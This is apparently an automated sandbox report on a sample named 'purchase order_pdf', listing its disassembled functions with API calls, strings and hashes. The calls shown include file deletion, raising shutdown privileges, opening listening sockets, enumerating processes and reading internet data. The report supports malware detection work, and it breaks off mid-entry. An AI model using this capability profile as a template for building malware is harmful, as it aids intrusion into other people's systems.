Opcode ID: f35d5909cefa57bdb816b4d8f4bfdac3ad53d810b271e026935bf569b34cc0f8
Instruction ID: 1c84980240bd986383109a0fd1e4c81a7bc4074296e537f26ecbd617262def07
Opcode Fuzzy Hash: f35d5909cefa57bdb816b4d8f4bfdac3ad53d810b271e026935bf569b34cc0f8
Instruction Fuzzy Hash: F8217E35201220AFDB10AF25EC49F6977A8FF55715F10802AFA4ADB2A2DB34E900CB59

Function 008D3A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 008748AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008748A1,?,?,008737C0,?), ref: 008748CE

Part of subcall function 008D4CD3: GetFileAttributesW.KERNEL32(?,008D3947), ref: 008D4CD4

FindFirstFileW.KERNEL32(?,?), ref: 008D3ADF
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 008D3B87
MoveFileW.KERNEL32(?,?), ref: 008D3B9A
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 008D3BB7
FindNextFileW.KERNEL32(00000000,00000010), ref: 008D3BD9
FindClose.KERNEL32(00000000,?,?,?,?), ref: 008D3BF5

Strings

\*.*, xrefs: 008D3A8A, 008D3A93, 008D3AA8

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: ff7f361de5a46faabbb3f796ce27c0460ac7a4e426cb395d0d4483dd26e88028
Instruction ID: 185f5e9e66b9edaaabe83be2f99845046c9d239a4e8a31e8090d0f14bdbc052b
Opcode Fuzzy Hash: ff7f361de5a46faabbb3f796ce27c0460ac7a4e426cb395d0d4483dd26e88028
Instruction Fuzzy Hash: AB519F3180111C9ACB15EBA4CD929EDB778FF15300F24826AE446F7196DF71AF09CB62

Function 008DF65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00877F41: _memmove.LIBCMT ref: 00877F82

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 008DF6AB
Sleep.KERNEL32(0000000A), ref: 008DF6DB
_wcscmp.LIBCMT ref: 008DF6EF
_wcscmp.LIBCMT ref: 008DF70A
FindNextFileW.KERNEL32(?,?), ref: 008DF7A8
FindClose.KERNEL32(00000000), ref: 008DF7BE

Strings

*.*, xrefs: 008DF690

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: cbb08172a18536b2df655ab312fecd080f556563417deb2b5fe13e83cc9aa562
Instruction ID: cb027427a72d115e170d0465a53fead3c8838f20022f1d508d190dcc72ec476a
Opcode Fuzzy Hash: cbb08172a18536b2df655ab312fecd080f556563417deb2b5fe13e83cc9aa562
Instruction Fuzzy Hash: 29415F7290021A9FCF11DF64CC85AEEBBB4FF05310F144666E919E6292DB30DE44DB91

Function 00884140 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1132COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00884520
VUUU, xrefs: 008844ED
VUUU, xrefs: 008B7B0C
ERCP, xrefs: 0088421F
VUUU, xrefs: 008844DB

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 53fa390cb130462456d479ac3c0765ccc76575f96125f733a8de49e87e607f21
Instruction ID: 49fd752752e2dace274e3a574453f5cb7e693541cc5b236357cb1472c52f20b5
Opcode Fuzzy Hash: 53fa390cb130462456d479ac3c0765ccc76575f96125f733a8de49e87e607f21
Instruction Fuzzy Hash: 13A25B71A0422ACBDF24EF58C9907EDB7B1FB54314F2491AAD85AE7380E7349E85CB50

Function 008858C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00885A05
_memmove.LIBCMT ref: 00885A55
_memmove.LIBCMT ref: 00885ABB

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 11fe30cc9be6b8cbe63c6b47a665fc7dcb67d53cd999dc09e086af60fafd1392
Instruction ID: f06d230f7dc7dff49c5452bdb01b67fcd8f1de5c2f6f80f098a63c92d9952834
Opcode Fuzzy Hash: 11fe30cc9be6b8cbe63c6b47a665fc7dcb67d53cd999dc09e086af60fafd1392
Instruction Fuzzy Hash: 40129970A00609DFDF14EFA8D985AAEB7F5FF48300F148169E406E7291EB36AE11CB51

Function 008D545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 008C8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008C8D0D
Part of subcall function 008C8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008C8D3A
Part of subcall function 008C8CC3: GetLastError.KERNEL32 ref: 008C8D47

ExitWindowsEx.USER32(?,00000000), ref: 008D549B

Strings

, xrefs: 008D5489
@, xrefs: 008D548E
SeShutdownPrivilege, xrefs: 008D546B

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: f216762e6e5d42d2b553f70f2ee7602bfe80d9616667eaeb67850e4d246bd003
Instruction ID: 8a30066ec2a953f510857d2f9c50d3a98ad471d6acc57199f951ca017f476e82
Opcode Fuzzy Hash: f216762e6e5d42d2b553f70f2ee7602bfe80d9616667eaeb67850e4d246bd003
Instruction Fuzzy Hash: 69014CB1654A155AE7286678DC4AFB67359FB04352F200337FD06D22C3DA504C80819B

Function 008E6596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 008E65EF
WSAGetLastError.WSOCK32(00000000), ref: 008E65FE
bind.WSOCK32(00000000,?,00000010), ref: 008E661A
listen.WSOCK32(00000000,00000005), ref: 008E6629
WSAGetLastError.WSOCK32(00000000), ref: 008E6643
closesocket.WSOCK32(00000000,00000000), ref: 008E6657

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 7795e35e18b75d928edf6fe97a276a0be9c42f2619e5c56f54cafc1234e27aca
Instruction ID: 510b1ab55c9885c2e91bd0ee07687a361b6c46ac84d0af6b77f4ab0a47d276c3
Opcode Fuzzy Hash: 7795e35e18b75d928edf6fe97a276a0be9c42f2619e5c56f54cafc1234e27aca
Instruction Fuzzy Hash: 3D218C302002149FCB10AF68C889F7EB7B9FF55360F148169EA5AE72E2DB70AD11CB51

Function 00885680 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00890FF6: std::exception::exception.LIBCMT ref: 0089102C
Part of subcall function 00890FF6: __CxxThrowException@8.LIBCMT ref: 00891041

_memmove.LIBCMT ref: 008C062F
_memmove.LIBCMT ref: 008C0744
_memmove.LIBCMT ref: 008C07EB

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: ffd8161bb69a139eb34b9f899c7e09f83d8078dd509905ed68c1975c2103f64c
Instruction ID: 6791eaa8c98a41a29581e08a6a2086b90bb58ae9c1d515c9a64bbd9f7fec5807
Opcode Fuzzy Hash: ffd8161bb69a139eb34b9f899c7e09f83d8078dd509905ed68c1975c2103f64c
Instruction Fuzzy Hash: 24027170A04209DFDF14EF68D981AAEBBB5FF44344F148069E80ADB295EB31DA51CF91

Function 00871287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00872612: GetWindowLongW.USER32(?,000000EB), ref: 00872623

DefDlgProcW.USER32(?,?,?,?,?), ref: 008719FA
GetSysColor.USER32(0000000F), ref: 00871A4E
SetBkColor.GDI32(?,00000000), ref: 00871A61

Part of subcall function 00871290: DefDlgProcW.USER32(?,00000020,?), ref: 008712D8

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 64b3faa8a60e364bb98aa02241c6a6db74a5ae8ced885c6029fd9c56c2395571
Instruction ID: 51f2638406769025e2eb64e8754c7ffe9ba839ddd60fdb67f9b1b560db5f9668
Opcode Fuzzy Hash: 64b3faa8a60e364bb98aa02241c6a6db74a5ae8ced885c6029fd9c56c2395571
Instruction Fuzzy Hash: 44A1787011516CBAEE28AB3C4C4CE7F759DFB42759B14C119F11AD6D9BEA20CD02D2B2

Function 008E6A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 008E80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 008E80CB

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 008E6AB1
WSAGetLastError.WSOCK32(00000000), ref: 008E6ADA
bind.WSOCK32(00000000,?,00000010), ref: 008E6B13
WSAGetLastError.WSOCK32(00000000), ref: 008E6B20
closesocket.WSOCK32(00000000,00000000), ref: 008E6B34

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: 6b72d1fc76396a092ba43d8da803ce58f36f3a0289ab95c4ede3acf5d5b2fb41
Instruction ID: e6cf816c353c0e8293f90c732fdfc88c89fcca2fe7325abca5b073ad5ec72efe
Opcode Fuzzy Hash: 6b72d1fc76396a092ba43d8da803ce58f36f3a0289ab95c4ede3acf5d5b2fb41
Instruction Fuzzy Hash: 33418475640214AFEB10AB289C86F7E77A5FF45764F04C068FA59EB3D2DA70DD008792

Function 008F55FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 008F564C
IsWindowEnabled.USER32 ref: 008F565A
GetForegroundWindow.USER32(?,?,00000001), ref: 008F5667
IsIconic.USER32 ref: 008F5675
IsZoomed.USER32 ref: 008F5683

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: cea09816464edf4039fc2903bfc1853908548c1a3c5ca51d40c55076b3e49395
Instruction ID: 0391516131f33ca665db5bfd5ea2626e2509c17ba014be518fbcfb90b14dd6f3
Opcode Fuzzy Hash: cea09816464edf4039fc2903bfc1853908548c1a3c5ca51d40c55076b3e49395
Instruction Fuzzy Hash: 681190313009256BE7211F36DC44F3ABB99FFA4721B458029EB5AD7241DB38D901CAA5

Function 008EC304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,008B1D88,?), ref: 008EC312
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 008EC324

Strings

kernel32.dll, xrefs: 008EC30D
GetSystemWow64DirectoryW, xrefs: 008EC31E

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 8f9cfeff207d023f89b297e4a087f11b8e739b52a9896cf12e431ed1407dfef4
Instruction ID: 4d87cf405c44e99b925dfe79d237448b34b526872a3a5e62605950cf50b259e9
Opcode Fuzzy Hash: 8f9cfeff207d023f89b297e4a087f11b8e739b52a9896cf12e431ed1407dfef4
Instruction Fuzzy Hash: 3EE08C70A00713CFDB214B3AD804A9676E4FF0A315F808439EA95C2311E770D881CA60

Function 00883190 Relevance: 6.6, APIs: 4, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: 552370656de5378eacf6d525c0978febd4e978a70ab0c6f7352c9b035125a456
Instruction ID: b67f77290066c3c2ea3b14058a41023e7495d5d9f83b8fd6740dd2f9d81b9fd4
Opcode Fuzzy Hash: 552370656de5378eacf6d525c0978febd4e978a70ab0c6f7352c9b035125a456
Instruction Fuzzy Hash: 9B2258715083019FC724EB18C891BAAB7E4FF84714F14892DF59AD7391EB71EA44CB92

Function 008EF121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 008EF151
Process32FirstW.KERNEL32(00000000,?), ref: 008EF15F

Part of subcall function 00877F41: _memmove.LIBCMT ref: 00877F82

Process32NextW.KERNEL32(00000000,?), ref: 008EF21F
CloseHandle.KERNEL32(00000000,?,?,?), ref: 008EF22E

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 68d747fc91cd7cfbc2f530c0f9d9cf5ed3e46dddc7d01eca58c706c7132c8923
Instruction ID: e86c51604d23d0cc6a278f651e21cf099f377dc83b59af299c1f9c6379d39689
Opcode Fuzzy Hash: 68d747fc91cd7cfbc2f530c0f9d9cf5ed3e46dddc7d01eca58c706c7132c8923
Instruction Fuzzy Hash: 105149715083119BD310EF28DC85E6BBBE8FF95710F50882DF599D6292EB70E904CB92

Function 008D40B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 008D40D1
_memset.LIBCMT ref: 008D40F2
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 008D4144
CloseHandle.KERNEL32(00000000), ref: 008D414D

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: 4348719eb8000a8477025fa60eca830cbb9126959438a2b203837c3b19c5eca2
Instruction ID: c96b4eabf2aac5c2e5dbad58b48d40445a7d61ec82247995744e4c04b5621d68
Opcode Fuzzy Hash: 4348719eb8000a8477025fa60eca830cbb9126959438a2b203837c3b19c5eca2
Instruction Fuzzy Hash: 8E11AB759012287AD7305BB59C4DFABBB7CFF44760F1042A6F908D7280D6744E80CBA4

Function 008CEB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 008CEB19

Strings

(, xrefs: 008CEB5F
|, xrefs: 008CEB49

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 9eb77c23f5a56595b03c777b16d9ae05b87ee44553d67f9ad45ccb70660618df
Instruction ID: dd6f262338818c552906e21f3f633b9de10bc8a11a6bb7b1a91df17905df3b33
Opcode Fuzzy Hash: 9eb77c23f5a56595b03c777b16d9ae05b87ee44553d67f9ad45ccb70660618df
Instruction Fuzzy Hash: BB321575A006059FDB28CF19C481E6AB7F1FF48720B15C56EE99ADB3A2DB70E941CB40

Function 008E25E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 008E26D5
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 008E270C

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 6bcb1ef4cc1a1b81f6fd63c567b5e1f4bff6ec474cba9776ac00579f234d8c53
Instruction ID: c8869fab43d272ecb07c2175b61b12777bec261943ab0d6823c389752e70ca9d
Opcode Fuzzy Hash: 6bcb1ef4cc1a1b81f6fd63c567b5e1f4bff6ec474cba9776ac00579f234d8c53
Instruction Fuzzy Hash: 4A411671504289BFEB20EE9ADC85EBBB7BCFB41728F10406AFA01E6150EA719E41D750

Function 008DB59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 008DB5AE
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 008DB608
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 008DB655

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: c2165ebdf61e8af1f17cd190bf35c6ba280ad0ac4689cc83dcab8ca0f5294168
Instruction ID: 1e4a4c4abb848463bffd1ed0165a131b7dad01e9028d0c6056dfcf9cb85ae204
Opcode Fuzzy Hash: c2165ebdf61e8af1f17cd190bf35c6ba280ad0ac4689cc83dcab8ca0f5294168
Instruction Fuzzy Hash: C5215E35A00118EFCB00EF69D880EADBBB8FF48310F1480AAE945EB351DB31E955CB51

Function 008C8CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00890FF6: std::exception::exception.LIBCMT ref: 0089102C
Part of subcall function 00890FF6: __CxxThrowException@8.LIBCMT ref: 00891041

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008C8D0D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008C8D3A
GetLastError.KERNEL32 ref: 008C8D47

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
